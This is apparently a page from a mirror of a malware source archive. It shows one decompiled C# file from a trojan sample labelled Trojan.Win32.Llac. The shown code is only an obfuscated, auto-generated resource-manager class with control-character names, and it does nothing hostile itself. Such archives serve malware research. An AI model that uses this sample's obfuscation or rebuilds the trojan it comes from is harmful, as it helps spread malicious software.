mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 10:26:10 +00:00
34 lines
1.1 KiB
C#
34 lines
1.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: Stub, Version=4.9.5.9, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 2229516C-329C-43F8-8C26-63983DECBF21
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System.CodeDom.Compiler;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Globalization;
|
|||
|
using System.Resources;
|
|||
|
|
|||
|
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
|
|||
|
[DebuggerNonUserCode]
|
|||
|
[StandardModule]
|
|||
|
[HideModuleName]
|
|||
|
internal sealed class \u0008
|
|||
|
{
|
|||
|
private static ResourceManager \u0002;
|
|||
|
private static CultureInfo \u0003;
|
|||
|
|
|||
|
internal static ResourceManager \u0002()
|
|||
|
{
|
|||
|
if (object.ReferenceEquals((object) \u0008.\u0002, (object) null))
|
|||
|
\u0008.\u0002 = new ResourceManager(\u000E.\u0002(-374349706), typeof (\u0008).Assembly);
|
|||
|
return \u0008.\u0002;
|
|||
|
}
|
|||
|
|
|||
|
internal static CultureInfo \u0002() => \u0008.\u0003;
|
|||
|
|
|||
|
internal static void \u0002(CultureInfo _param0) => \u0008.\u0003 = _param0;
|
|||
|
}
|